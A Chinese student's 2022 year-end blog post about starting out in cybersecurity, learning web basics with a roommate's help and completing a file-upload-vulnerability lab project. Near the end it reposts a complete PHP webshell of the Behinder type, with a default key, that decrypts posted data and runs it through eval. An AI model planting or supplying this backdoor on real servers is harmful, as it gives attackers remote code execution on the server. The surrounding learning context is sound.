2022我的网安之路

我是吉师大一的网安学生，从上大学之前我从来没接触过计算机，emm，在高中毕业后收到通知书的时候，学了一点的python，不多，解决不了问题，充其量就是个花瓶。

然后呢，进入校园了，刚开始看到什么都很新鲜，网安老师给我们看到我winhex，花瓶抓包，c语言老师给我看他的课件什么的，都觉得：哇这么厉害。然后呢，一学期很快就过去了，直到我们期末考试结束后，我们网安的系主任给我们一些论文材料，因为我们下学期会学web和操作系统，我们寝室5人一组，完成了web的7个项目。

说句实话如果是没有我们宿舍的大佬，我们完成的会很艰难。但是我们宿舍大佬是csdn的一位明星博主吧（我替我们大哥吹一下）；

大家可以看下Hong_zhong的博客_CSDN博客-混子的网安之路,python学习,冲刺祥云杯（2022限定）领域博主

因为我负责的项目就是文件上传漏洞，但是我在web这方面就是个混子，基本上是什么也不会的。这大哥手把手教我搭建服务器，搭建把常所用的配置文件，当然这wamp的服务器中间崩了很多次，我这大哥就是删了重新装，最后用到了80端口啥的，也就坎坎坷坷的完成了表面工作，再然后就是教我最基本的文件上传漏洞，在他教的基础下完成了第一个木马上传，也有了我的第一个csdn的文章，写的不好，有些实操没有发出来，就很鸡肋，但是官方将我放在了最佳新人的贴子里，就感觉有种说不出来的感觉。

可能兴趣提起来了也就感兴趣了，这两天睡得都比较晚，烟瘾相当大了，在我们宿舍大哥给我找的几个文章和视频，慢慢的接触web基础和SQL的基础，当然感谢我这大哥了，带我走这个网安的路，很艰难，说接触不难的都是吹nb，有人带就明显的感觉出来了相对于自己单干就很难，有人带就很舒服。

也希望我的下学期能够将web好好的学习一下，在csdn里好好发几篇不那么低级的文章。没了，点烟。

(1条消息) SQL_简介+基本命令_被社会散养被吉师遗忘的混子的博客-CSDN博客

再发一下上个文章里的代码吧 进行了加了备注

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

希望2023新年伊始之际，在这一年中能够好好的学web和操作系统，在csdn中好好的发自己的文章，争取早日拿到属于自己的证书。